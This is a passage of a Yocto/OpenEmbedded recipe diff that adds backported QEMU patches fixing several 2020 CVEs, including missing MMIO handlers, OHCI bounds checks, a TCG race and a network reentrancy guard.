12Acked-by: David Gibson <david@gibson.dropbear.id.au>
13Reviewed-by: Li Qiang <liq3ea@gmail.com>
14Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
15Message-Id: <20200811114133.672647-7-ppandit@redhat.com>
16Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
17
18CVE: CVE-2020-15469
19Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-6.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/921604e175b8ec06c39503310e7b3ec1e3eafe9e]
20Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
21---
22 hw/ppc/spapr_pci.c | 14 ++++++++++++--
23 1 file changed, 12 insertions(+), 2 deletions(-)
24
25--- a/hw/ppc/spapr_pci.c
26+++ b/hw/ppc/spapr_pci.c
27@@ -52,6 +52,7 @@
28 #include "sysemu/kvm.h"
29 #include "sysemu/hostmem.h"
30 #include "sysemu/numa.h"
31+#include "qemu/log.h"
32
33 /* Copied from the kernel arch/powerpc/platforms/pseries/msi.c */
34 #define RTAS_QUERY_FN 0
35@@ -738,6 +739,12 @@ static PCIINTxRoute spapr_route_intx_pin
36 return route;
37 }
38
39+static uint64_t spapr_msi_read(void *opaque, hwaddr addr, unsigned size)
40+{
41+ qemu_log_mask(LOG_GUEST_ERROR, "%s: invalid access\n", __func__);
42+ return 0;
43+}
44+
45 /*
46 * MSI/MSIX memory region implementation.
47 * The handler handles both MSI and MSIX.
48@@ -755,8 +762,11 @@ static void spapr_msi_write(void *opaque
49 }
50
51 static const MemoryRegionOps spapr_msi_ops = {
52- /* There is no .read as the read result is undefined by PCI spec */
53- .read = NULL,
54+ /*
55+ * .read result is undefined by PCI spec.
56+ * define .read method to avoid assert failure in memory_region_init_io
57+ */
58+ .read = spapr_msi_read,
59 .write = spapr_msi_write,
60 .endianness = DEVICE_LITTLE_ENDIAN
61 };
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-7.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-7.patch
new file mode 100644
index 0000000000..7d8ec32251
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-7.patch
@@ -0,0 +1,50 @@
1From 2c9fb3b784000c1df32231e1c2464bb2e3fc4620 Mon Sep 17 00:00:00 2001
2From: Prasad J Pandit <pjp@fedoraproject.org>
3Date: Tue, 11 Aug 2020 17:11:31 +0530
4Subject: [PATCH] tz-ppc: add dummy read/write methods
5
6Add tz-ppc-dummy mmio read/write methods to avoid assert failure
7during initialisation.
8
9Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
10Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
11Reviewed-by: Li Qiang <liq3ea@gmail.com>
12Message-Id: <20200811114133.672647-8-ppandit@redhat.com>
13Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
14
15CVE: CVE-2020-15469
16Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-7.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/2c9fb3b784000c1df32231e1c2464bb2e3fc4620 ]
17Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
18---
19 hw/misc/tz-ppc.c | 14 ++++++++++++++
20 1 file changed, 14 insertions(+)
21
22diff --git a/hw/misc/tz-ppc.c b/hw/misc/tz-ppc.c
23index 6431257..36495c6 100644
24--- a/hw/misc/tz-ppc.c
25+++ b/hw/misc/tz-ppc.c
26@@ -196,7 +196,21 @@ static bool tz_ppc_dummy_accepts(void *opaque, hwaddr addr,
27 g_assert_not_reached();
28 }
29
30+static uint64_t tz_ppc_dummy_read(void *opaque, hwaddr addr, unsigned size)
31+{
32+ g_assert_not_reached();
33+}
34+
35+static void tz_ppc_dummy_write(void *opaque, hwaddr addr,
36+ uint64_t data, unsigned size)
37+{
38+ g_assert_not_reached();
39+}
40+
41 static const MemoryRegionOps tz_ppc_dummy_ops = {
42+ /* define r/w methods to avoid assert failure in memory_region_init_io */
43+ .read = tz_ppc_dummy_read,
44+ .write = tz_ppc_dummy_write,
45 .valid.accepts = tz_ppc_dummy_accepts,
46 };
47
48--
491.8.3.1
50
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-8.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-8.patch
new file mode 100644
index 0000000000..7857ba266e
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-8.patch
@@ -0,0 +1,44 @@
1From 735754aaa15a6ed46db51fd731e88331c446ea54 Mon Sep 17 00:00:00 2001
2From: Prasad J Pandit <pjp@fedoraproject.org>
3Date: Tue, 11 Aug 2020 17:11:32 +0530
4Subject: [PATCH] imx7-ccm: add digprog mmio write method
5
6Add digprog mmio write method to avoid assert failure during
7initialisation.
8
9Reviewed-by: Li Qiang <liq3ea@gmail.com>
10Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
11Message-Id: <20200811114133.672647-9-ppandit@redhat.com>
12Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
13
14CVE: CVE-2020-15469
15Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-8.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/735754aaa15a6ed46db51fd731e88331c446ea54]
16Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
17---
18 hw/misc/imx7_ccm.c | 8 ++++++++
19 1 file changed, 8 insertions(+)
20
21diff --git a/hw/misc/imx7_ccm.c b/hw/misc/imx7_ccm.c
22index 02fc1ae..075159e 100644
23--- a/hw/misc/imx7_ccm.c
24+++ b/hw/misc/imx7_ccm.c
25@@ -131,8 +131,16 @@ static const struct MemoryRegionOps imx7_set_clr_tog_ops = {
26 },
27 };
28
29+static void imx7_digprog_write(void *opaque, hwaddr addr,
30+ uint64_t data, unsigned size)
31+{
32+ qemu_log_mask(LOG_GUEST_ERROR,
33+ "Guest write to read-only ANALOG_DIGPROG register\n");
34+}
35+
36 static const struct MemoryRegionOps imx7_digprog_ops = {
37 .read = imx7_set_clr_tog_read,
38+ .write = imx7_digprog_write,
39 .endianness = DEVICE_NATIVE_ENDIAN,
40 .impl = {
41 .min_access_size = 4,
42--
431.8.3.1
44
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15859.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15859.patch
new file mode 100644
index 0000000000..0f43adeea8
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15859.patch
@@ -0,0 +1,39 @@
1From 22dc8663d9fc7baa22100544c600b6285a63c7a3 Mon Sep 17 00:00:00 2001
2From: Jason Wang <jasowang@redhat.com>
3Date: Wed, 22 Jul 2020 16:57:46 +0800
4Subject: [PATCH] net: forbid the reentrant RX
5
6The memory API allows DMA into NIC's MMIO area. This means the NIC's
7RX routine must be reentrant. Instead of auditing all the NIC, we can
8simply detect the reentrancy and return early. The queue->delivering
9is set and cleared by qemu_net_queue_deliver() for other queue helpers
10to know whether the delivering in on going (NIC's receive is being
11called). We can check it and return early in qemu_net_queue_flush() to
12forbid reentrant RX.
13
14Signed-off-by: Jason Wang <jasowang@redhat.com>
15
16CVE: CVE-2020-15859
17Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/ubuntu/CVE-2020-15859.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/22dc8663d9fc7baa22100544c600b6285a63c7a3 ]
18Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
19---
20 net/queue.c | 3 +++
21 1 file changed, 3 insertions(+)
22
23diff --git a/net/queue.c b/net/queue.c
24index 0164727..19e32c8 100644
25--- a/net/queue.c
26+++ b/net/queue.c
27@@ -250,6 +250,9 @@ void qemu_net_queue_purge(NetQueue *queue, NetClientState *from)
28
29 bool qemu_net_queue_flush(NetQueue *queue)
30 {
31+ if (queue->delivering)
32+ return false;
33+
34 while (!QTAILQ_EMPTY(&queue->packets)) {
35 NetPacket *packet;
36 int ret;
37--
381.8.3.1
39
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-24165.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-24165.patch
new file mode 100644
index 0000000000..e0a27331a8
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-24165.patch
@@ -0,0 +1,94 @@
1CVE: CVE-2020-24165
2Upstream-Status: Backport [https://github.com/qemu/qemu/commit/886cc68943ebe8cf7e5f970be33459f95068a441 ]
3Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
4
5From 886cc68943ebe8cf7e5f970be33459f95068a441 Mon Sep 17 00:00:00 2001
6From: =?UTF-8?q?Alex=20Benn=C3=A9e?= <alex.bennee@linaro.org>
7Date: Fri, 14 Feb 2020 14:49:52 +0000
8Subject: [PATCH] accel/tcg: fix race in cpu_exec_step_atomic (bug 1863025)
9MIME-Version: 1.0
10Content-Type: text/plain; charset=UTF-8
11Content-Transfer-Encoding: 8bit
12
13The bug describes a race whereby cpu_exec_step_atomic can acquire a TB
14which is invalidated by a tb_flush before we execute it. This doesn't
15affect the other cpu_exec modes as a tb_flush by it's nature can only
16occur on a quiescent system. The race was described as:
17
18 B2. tcg_cpu_exec => cpu_exec => tb_find => tb_gen_code
19 B3. tcg_tb_alloc obtains a new TB
20
21 C3. TB obtained with tb_lookup__cpu_state or tb_gen_code
22 (same TB as B2)
23
24 A3. start_exclusive critical section entered
25 A4. do_tb_flush is called, TB memory freed/re-allocated
26 A5. end_exclusive exits critical section
27
28 B2. tcg_cpu_exec => cpu_exec => tb_find => tb_gen_code
29 B3. tcg_tb_alloc reallocates TB from B2
30
31 C4. start_exclusive critical section entered
32 C5. cpu_tb_exec executes the TB code that was free in A4
33
34The simplest fix is to widen the exclusive period to include the TB
35lookup. As a result we can drop the complication of checking we are in
36the exclusive region before we end it.
37
38Cc: Yifan <me@yifanlu.com>
39Buglink: https://bugs.launchpad.net/qemu/+bug/1863025
40Reviewed-by: Paolo Bonzini <pbonzini@redhat.com>
41Reviewed-by: Richard Henderson <richard.henderson@linaro.org>
42Signed-off-by: Alex Bennée <alex.bennee@linaro.org>
43Message-Id: <20200214144952.15502-1-alex.bennee@linaro.org>
44Signed-off-by: Richard Henderson <richard.henderson@linaro.org>
45---
46 accel/tcg/cpu-exec.c | 21 +++++++++++----------
47 1 file changed, 11 insertions(+), 10 deletions(-)
48
49diff --git a/accel/tcg/cpu-exec.c b/accel/tcg/cpu-exec.c
50index 2560c90eec79..d95c4848a47b 100644
51--- a/accel/tcg/cpu-exec.c
52+++ b/accel/tcg/cpu-exec.c
53@@ -240,6 +240,8 @@ void cpu_exec_step_atomic(CPUState *cpu)
54 uint32_t cf_mask = cflags & CF_HASH_MASK;
55
56 if (sigsetjmp(cpu->jmp_env, 0) == 0) {
57+ start_exclusive();
58+
59 tb = tb_lookup__cpu_state(cpu, &pc, &cs_base, &flags, cf_mask);
60 if (tb == NULL) {
61 mmap_lock();
62@@ -247,8 +249,6 @@ void cpu_exec_step_atomic(CPUState *cpu)
63 mmap_unlock();
64 }
65
66- start_exclusive();
67-
68 /* Since we got here, we know that parallel_cpus must be true. */
69 parallel_cpus = false;
70 cc->cpu_exec_enter(cpu);
71@@ -271,14 +271,15 @@ void cpu_exec_step_atomic(CPUState *cpu)
72 qemu_plugin_disable_mem_helpers(cpu);
73 }
74
75- if (cpu_in_exclusive_context(cpu)) {
76- /* We might longjump out of either the codegen or the
77- * execution, so must make sure we only end the exclusive
78- * region if we started it.
79- */
80- parallel_cpus = true;
81- end_exclusive();
82- }
83+
84+ /*
85+ * As we start the exclusive region before codegen we must still
86+ * be in the region if we longjump out of either the codegen or
87+ * the execution.
88+ */
89+ g_assert(cpu_in_exclusive_context(cpu));
90+ parallel_cpus = true;
91+ end_exclusive();
92 }
93
94 struct tb_desc {
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch
new file mode 100644
index 0000000000..be19256cef
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch
@@ -0,0 +1,46 @@
1From dfba99f17feb6d4a129da19d38df1bcd8579d1c3 Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
3Date: Tue, 1 Sep 2020 15:22:06 +0200
4Subject: [PATCH] hw/sd/sdhci: Fix DMA Transfer Block Size field
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9The 'Transfer Block Size' field is 12-bit wide.
10
11See section '2.2.2. Block Size Register (Offset 004h)' in datasheet.
12
13Two different bug reproducer available:
14- https://bugs.launchpad.net/qemu/+bug/1892960
15- https://ruhr-uni-bochum.sciebo.de/s/NNWP2GfwzYKeKwE?path=%2Fsdhci_oob_write1
16
17Cc: qemu-stable@nongnu.org
18Buglink: https://bugs.launchpad.net/qemu/+bug/1892960
19Fixes: d7dfca0807a ("hw/sdhci: introduce standard SD host controller")
20Reported-by: Alexander Bulekov <alxndr@bu.edu>
21Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
22Reviewed-by: Prasad J Pandit <pjp@fedoraproject.org>
23Tested-by: Alexander Bulekov <alxndr@bu.edu>
24Message-Id: <20200901140411.112150-3-f4bug@amsat.org>
25
26Upstream-Status: Backport
27CVE: CVE-2020-25085
28Signed-off-by: Armin Kuster <akuster@mvista.com>
29
30---
31 hw/sd/sdhci.c | 2 +-
32 1 file changed, 1 insertion(+), 1 deletion(-)
33
34Index: qemu-4.2.0/hw/sd/sdhci.c
35===================================================================
36--- qemu-4.2.0.orig/hw/sd/sdhci.c
37+++ qemu-4.2.0/hw/sd/sdhci.c
38@@ -1129,7 +1129,7 @@ sdhci_write(void *opaque, hwaddr offset,
39 break;
40 case SDHC_BLKSIZE:
41 if (!TRANSFERRING_DATA(s->prnsts)) {
42- MASKED_WRITE(s->blksize, mask, value);
43+ MASKED_WRITE(s->blksize, mask, extract32(value, 0, 12));
44 MASKED_WRITE(s->blkcnt, mask >> 16, value >> 16);
45 }
46
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch
new file mode 100644
index 0000000000..a46b5be193
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch
@@ -0,0 +1,87 @@
1From fbec359e9279ce78908b9f2af2c264e7448336af Mon Sep 17 00:00:00 2001
2From: Guenter Roeck <linux@roeck-us.net>
3Date: Mon, 17 Feb 2020 12:48:10 -0800
4Subject: [PATCH] hw: usb: hcd-ohci: Move OHCISysBusState and TYPE_SYSBUS_OHCI
5 to include file
6
7We need to be able to use OHCISysBusState outside hcd-ohci.c, so move it
8to its include file.
9
10Reviewed-by: Gerd Hoffmann <kraxel@redhat.com>
11Signed-off-by: Guenter Roeck <linux@roeck-us.net>
12Tested-by: Niek Linnenbank <nieklinnenbank@gmail.com>
13Message-id: 20200217204812.9857-2-linux@roeck-us.net
14Signed-off-by: Peter Maydell <peter.maydell@linaro.org>
15
16Upstream-Status: Backport
17CVE: CVE-2020-25624 patch #1
18Signed-off-by: Armin Kuster <akuster@mvista.com>
19
20---
21 hw/usb/hcd-ohci.c | 15 ---------------
22 hw/usb/hcd-ohci.h | 16 ++++++++++++++++
23 2 files changed, 16 insertions(+), 15 deletions(-)
24
25diff --git a/hw/usb/hcd-ohci.c b/hw/usb/hcd-ohci.c
26index 8a94bd004a..1e6e85e86a 100644
27--- a/hw/usb/hcd-ohci.c
28+++ b/hw/usb/hcd-ohci.c
29@@ -1870,21 +1870,6 @@ void ohci_sysbus_die(struct OHCIState *ohci)
30 ohci_bus_stop(ohci);
31 }
32
33-#define TYPE_SYSBUS_OHCI "sysbus-ohci"
34-#define SYSBUS_OHCI(obj) OBJECT_CHECK(OHCISysBusState, (obj), TYPE_SYSBUS_OHCI)
35-
36-typedef struct {
37- /*< private >*/
38- SysBusDevice parent_obj;
39- /*< public >*/
40-
41- OHCIState ohci;
42- char *masterbus;
43- uint32_t num_ports;
44- uint32_t firstport;
45- dma_addr_t dma_offset;
46-} OHCISysBusState;
47-
48 static void ohci_realize_pxa(DeviceState *dev, Error **errp)
49 {
50 OHCISysBusState *s = SYSBUS_OHCI(dev);
51diff --git a/hw/usb/hcd-ohci.h b/hw/usb/hcd-ohci.h
52index 16e3f1e13a..5c8819aedf 100644
53--- a/hw/usb/hcd-ohci.h
54+++ b/hw/usb/hcd-ohci.h
55@@ -22,6 +22,7 @@
56 #define HCD_OHCI_H
57
58 #include "sysemu/dma.h"
59+#include "hw/usb.h"
60
61 /* Number of Downstream Ports on the root hub: */
62 #define OHCI_MAX_PORTS 15
63@@ -90,6 +91,21 @@ typedef struct OHCIState {
64 void (*ohci_die)(struct OHCIState *ohci);
65 } OHCIState;
66
67+#define TYPE_SYSBUS_OHCI "sysbus-ohci"
68+#define SYSBUS_OHCI(obj) OBJECT_CHECK(OHCISysBusState, (obj), TYPE_SYSBUS_OHCI)
69+
70+typedef struct {
71+ /*< private >*/
72+ SysBusDevice parent_obj;
73+ /*< public >*/
74+
75+ OHCIState ohci;
76+ char *masterbus;
77+ uint32_t num_ports;
78+ uint32_t firstport;
79+ dma_addr_t dma_offset;
80+} OHCISysBusState;
81+
82 extern const VMStateDescription vmstate_ohci_state;
83
84 void usb_ohci_init(OHCIState *ohci, DeviceState *dev, uint32_t num_ports,
85--
862.25.1
87
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch
new file mode 100644
index 0000000000..8c1275b2f4
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch
@@ -0,0 +1,101 @@
1From 1328fe0c32d5474604105b8105310e944976b058 Mon Sep 17 00:00:00 2001
2From: Prasad J Pandit <pjp@fedoraproject.org>
3Date: Tue, 15 Sep 2020 23:52:58 +0530
4Subject: [PATCH] hw: usb: hcd-ohci: check len and frame_number variables
5
6While servicing the OHCI transfer descriptors(TD), OHCI host
7controller derives variables 'start_addr', 'end_addr', 'len'
8etc. from values supplied by the host controller driver.
9Host controller driver may supply values such that using
10above variables leads to out-of-bounds access issues.
11Add checks to avoid them.
12
13AddressSanitizer: stack-buffer-overflow on address 0x7ffd53af76a0
14 READ of size 2 at 0x7ffd53af76a0 thread T0
15 #0 ohci_service_iso_td ../hw/usb/hcd-ohci.c:734
16 #1 ohci_service_ed_list ../hw/usb/hcd-ohci.c:1180
17 #2 ohci_process_lists ../hw/usb/hcd-ohci.c:1214
18 #3 ohci_frame_boundary ../hw/usb/hcd-ohci.c:1257
19 #4 timerlist_run_timers ../util/qemu-timer.c:572
20 #5 qemu_clock_run_timers ../util/qemu-timer.c:586
21 #6 qemu_clock_run_all_timers ../util/qemu-timer.c:672
22 #7 main_loop_wait ../util/main-loop.c:527
23 #8 qemu_main_loop ../softmmu/vl.c:1676
24 #9 main ../softmmu/main.c:50
25
26Reported-by: Gaoning Pan <pgn@zju.edu.cn>
27Reported-by: Yongkang Jia <j_kangel@163.com>
28Reported-by: Yi Ren <yunye.ry@alibaba-inc.com>
29Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
30Message-id: 20200915182259.68522-2-ppandit@redhat.com
31Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
32
33Upstream-Status: Backport
34CVE: CVE-2020-25624 patch #2
35Signed-off-by: Armin Kuster <akuster@mvista.com>
36
37---
38 hw/usb/hcd-ohci.c | 24 ++++++++++++++++++++++--
39 1 file changed, 22 insertions(+), 2 deletions(-)
40
41diff --git a/hw/usb/hcd-ohci.c b/hw/usb/hcd-ohci.c
42index 1e6e85e86a..9dc59101f9 100644
43--- a/hw/usb/hcd-ohci.c
44+++ b/hw/usb/hcd-ohci.c
45@@ -731,7 +731,11 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed,
46 }
47
48 start_offset = iso_td.offset[relative_frame_number];
49- next_offset = iso_td.offset[relative_frame_number + 1];
50+ if (relative_frame_number < frame_count) {
51+ next_offset = iso_td.offset[relative_frame_number + 1];
52+ } else {
53+ next_offset = iso_td.be;
54+ }
55
56 if (!(OHCI_BM(start_offset, TD_PSW_CC) & 0xe) ||
57 ((relative_frame_number < frame_count) &&
58@@ -764,7 +768,12 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed,
59 }
60 } else {
61 /* Last packet in the ISO TD */
62- end_addr = iso_td.be;
63+ end_addr = next_offset;
64+ }
65+
66+ if (start_addr > end_addr) {
67+ trace_usb_ohci_iso_td_bad_cc_overrun(start_addr, end_addr);
68+ return 1;
69 }
70
71 if ((start_addr & OHCI_PAGE_MASK) != (end_addr & OHCI_PAGE_MASK)) {
72@@ -773,6 +782,9 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed,
73 } else {
74 len = end_addr - start_addr + 1;
75 }
76+ if (len > sizeof(ohci->usb_buf)) {
77+ len = sizeof(ohci->usb_buf);
78+ }
79
80 if (len && dir != OHCI_TD_DIR_IN) {
81 if (ohci_copy_iso_td(ohci, start_addr, end_addr, ohci->usb_buf, len,
82@@ -975,8 +987,16 @@ static int ohci_service_td(OHCIState *ohci, struct ohci_ed *ed)
83 if ((td.cbp & 0xfffff000) != (td.be & 0xfffff000)) {
84 len = (td.be & 0xfff) + 0x1001 - (td.cbp & 0xfff);
85 } else {
86+ if (td.cbp > td.be) {
87+ trace_usb_ohci_iso_td_bad_cc_overrun(td.cbp, td.be);
88+ ohci_die(ohci);
89+ return 1;
90+ }
91 len = (td.be - td.cbp) + 1;
92 }
93+ if (len > sizeof(ohci->usb_buf)) {
94+ len = sizeof(ohci->usb_buf);
95+ }
96
97 pktlen = len;
98 if (len && dir != OHCI_TD_DIR_IN) {
99--
1002.25.1
101
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch
new file mode 100644
index 0000000000..374d7c4562
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch
@@ -0,0 +1,42 @@
1From 1be90ebecc95b09a2ee5af3f60c412b45a766c4f Mon Sep 17 00:00:00 2001
2From: Prasad J Pandit <pjp@fedoraproject.org>
3Date: Tue, 15 Sep 2020 23:52:59 +0530
4Subject: [PATCH] hw: usb: hcd-ohci: check for processed TD before retire
5
6While servicing OHCI transfer descriptors(TD), ohci_service_iso_td
7retires a TD if it has passed its time frame. It does not check if
8the TD was already processed once and holds an error code in TD_CC.
9It may happen if the TD list has a loop. Add check to avoid an
10infinite loop condition.
11
12Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
13Reviewed-by: Li Qiang <liq3ea@gmail.com>
14Message-id: 20200915182259.68522-3-ppandit@redhat.com
15Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
16
17Upstream-Status: Backport
18CVE: CVE-2020-25625
19Signed-off-by: Armin Kuster <akuster@mvista.com>
20
21---
22 hw/usb/hcd-ohci.c | 4 ++++
23 1 file changed, 4 insertions(+)
24
25diff --git a/hw/usb/hcd-ohci.c b/hw/usb/hcd-ohci.c
26index 9dc59101f9..8b912e95d3 100644
27--- a/hw/usb/hcd-ohci.c
28+++ b/hw/usb/hcd-ohci.c
29@@ -691,6 +691,10 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed,
30 the next ISO TD of the same ED */
31 trace_usb_ohci_iso_td_relative_frame_number_big(relative_frame_number,
32 frame_count);
33+ if (OHCI_CC_DATAOVERRUN == OHCI_BM(iso_td.flags, TD_CC)) {
34+ /* avoid infinite loop */
35+ return 1;
36+ }
37 OHCI_SET_BM(iso_td.flags, TD_CC, OHCI_CC_DATAOVERRUN);
38 ed->head &= ~OHCI_DPTR_MASK;
39 ed->head |= (iso_td.next & OHCI_DPTR_MASK);
40--
412.25.1
42
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch
new file mode 100644
index 0000000000..7bfc2beecb
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch
@@ -0,0 +1,49 @@
1From 7564bf7701f00214cdc8a678a9f7df765244def1 Mon Sep 17 00:00:00 2001
2From: Prasad J Pandit <pjp@fedoraproject.org>
3Date: Wed, 21 Oct 2020 11:35:50 +0530
4Subject: [PATCH] net: remove an assert call in eth_get_gso_type
5
6eth_get_gso_type() routine returns segmentation offload type based on
7L3 protocol type. It calls g_assert_not_reached if L3 protocol is
8unknown, making the following return statement unreachable. Remove the
9g_assert call, it maybe triggered by a guest user.
10
11Reported-by: Gaoning Pan <pgn@zju.edu.cn>
12Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
13Signed-off-by: Jason Wang <jasowang@redhat.com>
14
15Upsteram-Status: Backport
16CVE: CVE-2020-27617
17Signed-off-by: Armin Kuster <akuster@mvista.com>
18
19---
20 net/eth.c | 6 +++---
21 1 file changed, 3 insertions(+), 3 deletions(-)
22
23diff --git a/net/eth.c b/net/eth.c
24index 0c1d413ee2..1e0821c5f8 100644
25--- a/net/eth.c
26+++ b/net/eth.c
27@@ -16,6 +16,7 @@
28 */
29
30 #include "qemu/osdep.h"
31+#include "qemu/log.h"
32 #include "net/eth.h"
33 #include "net/checksum.h"
34 #include "net/tap.h"
35@@ -71,9 +72,8 @@ eth_get_gso_type(uint16_t l3_proto, uint8_t *l3_hdr, uint8_t l4proto)
36 return VIRTIO_NET_HDR_GSO_TCPV6 | ecn_state;
37 }
38 }
39-
40- /* Unsupported offload */
41- g_assert_not_reached();
42+ qemu_log_mask(LOG_UNIMP, "%s: probably not GSO frame, "
43+ "unknown L3 protocol: 0x%04"PRIx16"\n", __func__, l3_proto);
44
45 return VIRTIO_NET_HDR_GSO_NONE | ecn_state;
46 }
47--
482.25.1
49
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-27821.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-27821.patch
new file mode 100644
index 0000000000..e26bc31bbb
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-27821.patch
@@ -0,0 +1,73 @@
1From 15222d4636d742f3395fd211fad0cd7e36d9f43e Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Tue, 16 Aug 2022 10:07:01 +0530
4Subject: [PATCH] CVE-2020-27821
5
6Upstream-Status: Backport [https://git.qemu.org/?p=qemu.git;a=commit;h=4bfb024bc76973d40a359476dc0291f46e435442]
7CVE: CVE-2020-27821
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9
10memory: clamp cached translation in case it points to an MMIO region
11
12In using the address_space_translate_internal API, address_space_cache_init
13forgot one piece of advice that can be found in the code for
14address_space_translate_internal:
15
16 /* MMIO registers can be expected to perform full-width accesses based only
17 * on their address, without considering adjacent registers that could
18 * decode to completely different MemoryRegions. When such registers
19 * exist (e.g. I/O ports 0xcf8 and 0xcf9 on most PC chipsets), MMIO
20 * regions overlap wildly. For this reason we cannot clamp the accesses
21 * here.
22 *
23 * If the length is small (as is the case for address_space_ldl/stl),
24 * everything works fine. If the incoming length is large, however,
25 * the caller really has to do the clamping through memory_access_size.
26 */
27
28address_space_cache_init is exactly one such case where "the incoming length
29is large", therefore we need to clamp the resulting length---not to
30memory_access_size though, since we are not doing an access yet, but to
31the size of the resulting section. This ensures that subsequent accesses
32to the cached MemoryRegionSection will be in range.
33
34With this patch, the enclosed testcase notices that the used ring does
35not fit into the MSI-X table and prints a "qemu-system-x86_64: Cannot map used"
36error.
37
38Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
39---
40 exec.c | 10 ++++++++++
41 1 file changed, 10 insertions(+)
42
43diff --git a/exec.c b/exec.c
44index 2d6add46..1360051a 100644
45--- a/exec.c
46+++ b/exec.c
47@@ -3632,6 +3632,7 @@ int64_t address_space_cache_init(MemoryRegionCache *cache,
48 AddressSpaceDispatch *d;
49 hwaddr l;
50 MemoryRegion *mr;
51+ Int128 diff;
52
53 assert(len > 0);
54
55@@ -3640,6 +3641,15 @@ int64_t address_space_cache_init(MemoryRegionCache *cache,
56 d = flatview_to_dispatch(cache->fv);
57 cache->mrs = *address_space_translate_internal(d, addr, &cache->xlat, &l, true);
58
59+ /*
60+ * cache->xlat is now relative to cache->mrs.mr, not to the section itself.
61+ * Take that into account to compute how many bytes are there between
62+ * cache->xlat and the end of the section.
63+ */
64+ diff = int128_sub(cache->mrs.size,
65+ int128_make64(cache->xlat - cache->mrs.offset_within_region));
66+ l = int128_get64(int128_min(diff, int128_make64(l)));
67+
68 mr = cache->mrs.mr;
69 memory_region_ref(mr);
70 if (memory_access_is_direct(mr, is_write)) {
71--
722.25.1
73
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch
new file mode 100644
index 0000000000..756b1c1495
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch
@@ -0,0 +1,48 @@
1From c2cb511634012344e3d0fe49a037a33b12d8a98a Mon Sep 17 00:00:00 2001
2From: Prasad J Pandit <pjp@fedoraproject.org>
3Date: Wed, 11 Nov 2020 18:36:36 +0530
